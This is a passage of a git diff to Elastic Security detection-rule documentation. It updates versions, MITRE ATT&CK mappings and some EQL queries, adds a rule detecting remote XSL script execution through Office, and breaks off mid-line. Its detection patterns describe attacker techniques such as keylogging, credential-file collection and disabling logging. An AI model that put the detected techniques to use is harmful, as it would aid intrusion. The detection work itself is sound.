b/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc index 85d679df88..bd93808e36 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-windows-error-manager-masquerading.asciidoc @@ -36,7 +36,7 @@ Identifies suspicious instances of the Windows Error Reporting process (WerFault * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -125,3 +125,7 @@ sequence by host.id, process.entity_id with maxspan = 5s ** Name: Masquerading ** ID: T1036 ** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc index b49b90ffb2..d6dda5d8d2 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-keylogging-script.asciidoc @@ -34,7 +34,7 @@ Detects the use of Win32 API Functions that can be used to capture user keystrok * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -132,3 +132,7 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc index 5e4218e572..c3b823ade1 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-block-logging-disabled.asciidoc @@ -36,7 +36,7 @@ Identifies attempts to disable PowerShell Script Block Logging via registry modi * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -119,3 +119,7 @@ registry where host.os.type == "windows" and event.type == "change" and ** Name: Disable Windows Event Logging ** ID: T1562.002 ** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc index 684382b712..d6546ead2d 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-password-policy-discovery-capabilities.asciidoc @@ -28,10 +28,11 @@ Identifies the use of Cmdlets and methods related to remote execution activities * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Execution * Data Source: PowerShell Logs * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -99,3 +100,15 @@ event.category: "process" and host.os.type:windows and ** Name: Password Policy Discovery ** ID: T1201 ** Reference URL: https://attack.mitre.org/techniques/T1201/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc index 3f72d35375..f64d6536bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc @@ -32,10 +32,11 @@ Identifies the use of Cmdlets and methods related to remote execution activities * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Execution * Data Source: PowerShell Logs * Rule Type: BBR -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -86,3 +87,15 @@ event.category:process and host.os.type:windows and ** Name: Windows Remote Management ** ID: T1021.006 ** Reference URL: https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc index 7950c02561..20425ddb5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-share-enumeration-script.asciidoc @@ -32,10 +32,12 @@ Detects scripts that contain PowerShell functions, structures, or Windows API fu * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -129,3 +131,11 @@ event.category:process and host.os.type:windows and ** Name: Native API ** ID: T1106 ** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc index 2d50ba7f68..d1de60cd0b 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-discovery-related-windows-api-functions.asciidoc @@ -31,10 +31,12 @@ This rule detects the use of discovery-related Windows API functions in PowerShe * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Collection +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -165,3 +167,11 @@ event.category:process and host.os.type:windows and ** Name: Native API ** ID: T1106 ** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc index f000ce607c..7c74e034a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/powershell-suspicious-script-with-audio-capture-capabilities.asciidoc @@ -33,7 +33,7 @@ Detects PowerShell scripts that can record audio, a common feature in popular po * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -127,3 +127,7 @@ event.category:process and host.os.type:windows and ** Name: PowerShell ** ID: T1059.001 ** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc index 203974c199..2cf76bd7e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-injection-by-the-microsoft-build-engine.asciidoc @@ -28,9 +28,10 @@ An instance of MSBuild, the Microsoft Build Engine, created a thread in another * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Privilege Escalation * Data Source: Sysmon Only -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -58,6 +59,14 @@ process.name:MSBuild.exe and host.os.type:windows and event.action:"CreateRemote ** Name: Process Injection ** ID: T1055 ** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ * Tactic: ** Name: Privilege Escalation ** ID: TA0004 diff --git a/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc index ea0823b4d2..e2f1cb1df2 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-started-from-process-id-pid-file.asciidoc @@ -37,7 +37,7 @@ Identifies a new process starting from a process ID (PID), lock or reboot file w * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -58,6 +58,8 @@ Detection alerts from this rule indicate a process spawned from an executable ma - Examine parent and child process relationships of the new process to determine if other processes are running. - Examine the /var/run directory using Osquery to determine other potential PID files with unsually large file sizes, indicative of it being an executable: "SELECT f.size, f.uid, f.type, f.path from file f WHERE path like '/var/run/%%';" - Examine the reputation of the SHA256 hash from the PID file in a database like VirusTotal to identify additional pivots and artifacts for investigation. + + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc index 10b7cbe10e..b65b3a198c 100644 --- a/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/process-termination-followed-by-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies a process termination event quickly followed by the deletion of its e * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -124,6 +124,14 @@ sequence by host.id with maxspan=5s ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: ** Name: Indicator Removal ** ID: T1070 ** Reference URL: https://attack.mitre.org/techniques/T1070/ diff --git a/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc index a7103f100f..41d92290cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/psexec-network-connection.asciidoc @@ -29,10 +29,11 @@ Identifies use of the SysInternals tool PsExec.exe making a network connection. * OS: Windows * Use Case: Threat Detection * Tactic: Execution +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -119,3 +120,15 @@ sequence by process.entity_id ** Name: Lateral Movement ** ID: TA0008 ** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc index e2c11b9c5d..967e0e6785 100644 --- a/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rare-aws-error-code.asciidoc @@ -30,7 +30,7 @@ A machine learning job detected an unusual error in a CloudTrail message. These * Rule Type: Machine Learning * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc index b5d7c31931..db84424902 100644 --- a/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/rdp-enabled-via-registry.asciidoc @@ -30,11 +30,12 @@ Identifies registry write modifications to enable Remote Desktop Protocol (RDP) * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -117,3 +118,11 @@ registry where host.os.type == "windows" and ** Name: Remote Desktop Protocol ** ID: T1021.001 ** Reference URL: https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc index 37e3302372..9165dc53f3 100644 --- a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appcert-dll.asciidoc @@ -30,10 +30,11 @@ Detects attempts to maintain persistence by creating registry keys using AppCert * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -78,3 +79,15 @@ registry where host.os.type == "windows" and ** Name: AppCert DLLs ** ID: T1546.009 ** Reference URL: https://attack.mitre.org/techniques/T1546/009/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppCert DLLs +** ID: T1546.009 +** Reference URL: https://attack.mitre.org/techniques/T1546/009/ diff --git a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc index c60b28595f..22378cafcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/registry-persistence-via-appinit-dll.asciidoc @@ -30,11 +30,12 @@ AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every proces * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -135,3 +136,11 @@ registry where host.os.type == "windows" and ** Name: AppInit DLLs ** ID: T1546.010 ** Reference URL: https://attack.mitre.org/techniques/T1546/010/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc index 26032562ee..d47eab30b8 100644 --- a/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-execution-via-file-shares.asciidoc @@ -8,9 +8,6 @@ Identifies the execution of a file that was created by the virtual system proces *Rule indices*: * logs-endpoint.events.* -* winlogbeat-* -* logs-windows.* -* endgame-* *Severity*: medium @@ -36,7 +33,7 @@ Identifies the execution of a file that was created by the virtual system proces * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -106,7 +103,8 @@ Adversaries can use network shares to host tooling to support the compromise of [source, js] ---------------------------------- sequence with maxspan=1m - [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path + [file where host.os.type == "windows" and event.type in ("creation", "change") and + process.pid == 4 and (file.extension : "exe" or file.Ext.header_bytes : "4d5a*")] by host.id, file.path [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc index 9d8f1efed3..b906c4992e 100644 --- a/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/remote-file-download-via-script-interpreter.asciidoc @@ -29,10 +29,11 @@ Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) bei * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -121,3 +122,15 @@ sequence by host.id, process.entity_id ** Name: Ingress Tool Transfer ** ID: T1105 ** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc b/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc new file mode 100644 index 0000000000..faafe4c463 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc @@ -0,0 +1,84 @@ +[[remote-xsl-script-execution-via-com]] +=== Remote XSL Script Execution via COM + +Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [library where host.os.type == "windows" and dll.name : "msxml3.dll" and + process.name : ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe")] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe") and + not process.executable : + ("?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWoW64\\WerFault.exe", + "?:\\windows\\splwow64.exe", + "?:\\Windows\\System32\\conhost.exe", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*exe")] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: XSL Script Processing +** ID: T1220 +** Reference URL: https://attack.mitre.org/techniques/T1220/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc index 1973b7ca8c..1cfde4618e 100644 --- a/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-task-created-by-a-windows-script.asciidoc @@ -30,10 +30,11 @@ A scheduled task was created by a Windows script via cscript.exe, wscript.exe or * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -82,3 +83,19 @@ sequence by host.id with maxspan = 30s ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc index 6adaa08cab..12ec1650cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-task-execution-at-scale-via-gpo.asciidoc @@ -35,11 +35,12 @@ Detects the modification of Group Policy Object attributes to execute a schedule * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Lateral Movement * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -120,3 +121,11 @@ or ** Name: Group Policy Modification ** ID: T1484.001 ** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc index 9d63935fec..760f9c1d87 100644 --- a/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/scheduled-tasks-at-command-enabled.asciidoc @@ -32,10 +32,11 @@ Identifies attempts to enable the Windows scheduled tasks AT command via the reg * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -79,3 +80,15 @@ registry where host.os.type == "windows" and ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: At +** ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc index c373a68fef..4c7427228d 100644 --- a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-using-wmic.asciidoc @@ -35,7 +35,7 @@ Identifies the use of Windows Management Instrumentation Command (WMIC) to disco * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -103,3 +103,11 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" ** Name: Security Software Discovery ** ID: T1518.001 ** Reference URL: https://attack.mitre.org/techniques/T1518/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc index ea0896e047..f369da689d 100644 --- a/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/security-software-discovery-via-grep.asciidoc @@ -32,7 +32,7 @@ Identifies the use of the grep command to discover known third-party macOS and L * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -116,7 +116,16 @@ process.name : "grep" and user.id != "0" and "osquery*", "elastic-endpoint*" ) and - not (process.args : "Avast" and process.args : "Passwords") + not ( + (process.args : "Avast" and process.args : "Passwords") or + (process.parent.args : "/opt/McAfee/agent/scripts/ma" and process.parent.args : "checkhealth") or + (process.command_line : ( + "grep ESET Command-line scanner, version %s -A2", + "grep -i McAfee Web Gateway Core version:", + "grep --color=auto ESET Command-line scanner, version %s -A2" + ) + ) + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc index 3ee71cc0f0..b8773ee3dc 100644 --- a/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sensitive-files-compression.asciidoc @@ -3,7 +3,7 @@ Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. -*Rule type*: query +*Rule type*: new_terms *Rule indices*: @@ -35,7 +35,7 @@ Identifies the use of a compression utility to collect known files containing se * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc index 1976b3f02b..3d843ae277 100644 --- a/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc @@ -35,11 +35,12 @@ Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user rig * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Persistence * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -104,7 +105,15 @@ event.action:"Authorization Policy Change" and event.code:4704 and ** Name: Credential Access ** ID: TA0006 ** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ * Tactic: ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc index 46a1112672..8372f2b102 100644 --- a/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/service-control-spawned-via-script-interpreter.asciidoc @@ -31,11 +31,13 @@ Identifies Service Control (sc.exe) spawning from script interpreter processes t * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -121,3 +123,43 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: 